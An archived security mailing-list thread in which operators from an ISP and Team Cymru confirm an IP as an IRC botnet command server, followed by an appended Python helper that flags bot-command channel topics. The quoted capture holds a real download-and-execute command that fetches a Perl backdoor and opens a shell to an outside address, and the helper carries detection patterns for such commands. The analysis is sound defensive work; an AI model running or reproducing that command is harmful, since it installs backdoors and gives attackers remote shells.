[nsp-sec] 72.55.133.149

Chris Calvert Chris.Calvert at telus.com
Wed May 5 12:00:31 EDT 2010


Thanks Steve, clearly badness cohabiting with legitimate content.

Our abuse folks are in contact with iWeb to get them to clean up the host, source of our information and details relating to it left out of course. We're only telling them there is something bad relating to botnets and an IRC C&C on the IP and leaving it to them to figure out the rest as a result of their investigation.

Chris

> -----Original Message-----
> From: Stephen Gill [mailto:gillsr at cymru.com]
> Sent: May-05-10 9:42 AM
> To: Chris Calvert; NSP-SEC
> Subject: Re: [nsp-sec] 72.55.133.149
> 
> Looks naughty:
> 
> :Pucioasa.RO.EU.Undernet.Org 001 foo :Welcome to the Internet Relay
> Network
> foo
> :Pucioasa.RO.EU.Undernet.Org 002 foo :Your host is
> Pucioasa.RO.EU.Undernet.Org, running version beware1.5.7
> :Pucioasa.RO.EU.Undernet.Org 003 foo :This server was created Tue Jul
> 13
> 2004 at 20:36:17 GMT
> :Pucioasa.RO.EU.Undernet.Org 004 foo Pucioasa.RO.EU.Undernet.Org
> beware1.5.7
> dgikoswx biklmnoprstv
> :Pucioasa.RO.EU.Undernet.Org 005 foo MAP SILENCE=15 WHOX WALLCHOPS
> WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=45
> :are
> supported by this server
> :Pucioasa.RO.EU.Undernet.Org 005 foo NICKLEN=12 TOPICLEN=160
> AWAYLEN=160
> KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst
> CASEMAPPING=rfc1459 :are supported by this server
> :Pucioasa.RO.EU.Undernet.Org 251 foo :There are 2 users and 52
> invisible on
> 1 servers
> :Pucioasa.RO.EU.Undernet.Org 252 foo 1 :operator(s) online
> :Pucioasa.RO.EU.Undernet.Org 254 foo 2 :channels formed
> :Pucioasa.RO.EU.Undernet.Org 255 foo :I have 54 clients and 0 servers
> :Pucioasa.RO.EU.Undernet.Org NOTICE foo :Highest connection count: 64
> (64
> clients)
> :Pucioasa.RO.EU.Undernet.Org 422 foo :MOTD File is missing
> :Pucioasa.RO.EU.Undernet.Org NOTICE foo :on 1 ca 1(4) ft 10(10)
> LIST
> :Pucioasa.RO.EU.Undernet.Org 321 foo Channel :Users  Name
> :Pucioasa.RO.EU.Undernet.Org 322 foo #drone 5 :
> :Pucioasa.RO.EU.Undernet.Org 322 foo #flood 48 :cd /tmp;wget
> arkstock.com/help/inc/dc.txt;perl dc.txt 76.74.156.155 23
> :Pucioasa.RO.EU.Undernet.Org 323 foo :End of /LIST
> 
> 
> Dc.txt is a backdoor, instructed to connect to 76.74.156.155 23 and
> spawn a
> shell.
> 
> -- steve
> 
> 
> On 5/5/10 8:27 AM, "Chris Calvert" <Chris.Calvert at telus.com> wrote:
> 
> > ----------- nsp-security Confidential --------
> >
> > Can anyone (incl Team Cymru) comment on what they are seeing
> regarding these
> > entries in the rsv2 and dnsrr lists?
> >
> > 32613 | IWEB-AS - iWeb Technologies Inc. | 72.55.133.149   | tcp  |
> 6667  |
> > 2010-04-27 22:51:50 | 2010-05-05 22:51:50 | bot | 0 | 1 | ID:
> > Pucioasa.RO.EU.Undernet.ORG
> >
> > fedora.unixcod.com                       BOTNET  A      72.55.133.149
> > 32613  2010-04-26 02:31:49  STALE   TCP 6667
> >
> > The host is a webhosting platform, and there is legitimate content
> hosted at
> > the IP. I want to make sure it is a definite source of badness.
> >
> > Thanks,
> >
> > Chris
> > TELUS - AS852
> >
> >
> >
> >
> > _______________________________________________
> > nsp-security mailing list
> > nsp-security at puck.nether.net
> > https://puck.nether.net/mailman/listinfo/nsp-security
> >
> > Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> > community. Confidentiality is essential for effective Internet
> security
> > counter-measures.
> > _______________________________________________
> 
> --
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
> 
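A small detection helper, added here as an example (not code from the thread, from Team Cymru or from TELUS): it parses the numeric replies of a captured IRC session, pulls the user and client totals out of the 251/255 lines, and flags channels whose LIST (322) topic reads like a download-and-execute command, which is exactly the tell in the #flood topic of Steve's capture. The session text is constructed to match that shape; the server name, download host and callback address in it are placeholders (example.invalid, TEST-NET 192.0.2.0/24), not the reported ones, and the keyword lists are assumptions of this example, not a published ruleset.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of a captured IRC session, shaped like the LIST output
# quoted in the thread. Server name, download host and callback address are
# placeholders (example.invalid, TEST-NET 192.0.2.0/24), not the reported ones.
SAMPLE_SESSION = """\
:irc.example.invalid 001 foo :Welcome to the Internet Relay Network foo
:irc.example.invalid 251 foo :There are 2 users and 52 invisible on 1 servers
:irc.example.invalid 252 foo 1 :operator(s) online
:irc.example.invalid 255 foo :I have 54 clients and 0 servers
:irc.example.invalid 422 foo :MOTD File is missing
:irc.example.invalid 321 foo Channel :Users  Name
:irc.example.invalid 322 foo #drone 5 :
:irc.example.invalid 322 foo #flood 48 :cd /tmp;wget example.invalid/help/inc/dc.txt;perl dc.txt 192.0.2.10 23
:irc.example.invalid 322 foo #linux 12 :Friendly Linux help, no bots please
:irc.example.invalid 323 foo :End of /LIST
"""


@dataclass
class Numeric:
    """One server numeric reply: ':prefix CODE target middle-params [:trailing]'."""
    prefix: str
    code: str
    target: str
    params: List[str]
    trailing: Optional[str]


def parse_numeric(line: str) -> Optional[Numeric]:
    """Parse an RFC 1459 style numeric reply; return None for anything else."""
    line = line.rstrip("\r\n")
    if not line.startswith(":"):
        return None
    prefix, _, rest = line[1:].partition(" ")
    # The trailing parameter starts at the first ' :' and may be empty (see #drone).
    middle, sep, trailing = rest.partition(" :")
    words = middle.split()
    if len(words) < 2 or not (len(words[0]) == 3 and words[0].isdigit()):
        return None
    code, target, *params = words
    return Numeric(prefix, code, target, params, trailing if sep else None)


# Heuristics (assumed for this example) for a topic that is really a command to bots.
TOPIC_PATTERNS = [
    (re.compile(r"\b(wget|curl|fetch|tftp)\b"), "downloader in topic"),
    (re.compile(r"\b(perl|python|sh|bash|php)\s+\S+"), "interpreter invocation in topic"),
    (re.compile(r"\bcd\s+/(tmp|var/tmp|dev/shm)\b"), "changes into a world-writable directory"),
    (re.compile(r";|&&|\|\|"), "shell command chaining"),
]
NAME_PATTERN = re.compile(r"^#(drone|flood|bot|scan|ddos|exploit)", re.I)
NAME_REASON = "channel name matches common bot-herder naming"


@dataclass
class ChannelFinding:
    name: str
    users: int
    topic: str
    reasons: List[str]


def assess_channels(session_text: str) -> List[ChannelFinding]:
    """Score every RPL_LIST (322) entry in the capture."""
    findings = []
    for line in session_text.splitlines():
        msg = parse_numeric(line)
        if msg is None or msg.code != "322" or not msg.params:
            continue
        name = msg.params[0]
        users = int(msg.params[1]) if len(msg.params) > 1 and msg.params[1].isdigit() else 0
        topic = msg.trailing or ""
        reasons = [why for rx, why in TOPIC_PATTERNS if rx.search(topic)]
        if NAME_PATTERN.match(name):
            reasons.append(NAME_REASON)
        findings.append(ChannelFinding(name, users, topic, reasons))
    return findings


def server_summary(session_text: str) -> Dict[str, int]:
    """Pull the visible/invisible user and client totals out of the 251 and 255 replies."""
    summary: Dict[str, int] = {}
    for line in session_text.splitlines():
        msg = parse_numeric(line)
        if msg is None or msg.trailing is None:
            continue
        if msg.code == "251":
            m = re.search(r"There are (\d+) users and (\d+) invisible", msg.trailing)
            if m:
                summary["visible"], summary["invisible"] = int(m.group(1)), int(m.group(2))
        elif msg.code == "255":
            m = re.search(r"I have (\d+) clients", msg.trailing)
            if m:
                summary["clients"] = int(m.group(1))
    return summary


def likely_cnc_channels(session_text: str, min_share: float = 0.5) -> List[str]:
    """Channels with a command-like topic that also hold most of the server's clients."""
    clients = server_summary(session_text).get("clients", 0)
    out = []
    for f in assess_channels(session_text):
        command_like = any(r != NAME_REASON for r in f.reasons)
        if command_like and clients and f.users >= min_share * clients:
            out.append(f.name)
    return out


if __name__ == "__main__":
    print(server_summary(SAMPLE_SESSION))
    for f in assess_channels(SAMPLE_SESSION):
        print(f.name, f.users, f.reasons)
    print("likely C&C channels:", likely_cnc_channels(SAMPLE_SESSION))
```

Run against a real capture by replacing SAMPLE_SESSION with the raw server lines; the name-based rule on its own is weak (a channel called #drone with an empty topic is only a hint), so the verdict in likely_cnc_channels requires a command-like topic plus a large share of the server's clients, which is the combination the capture above exhibits.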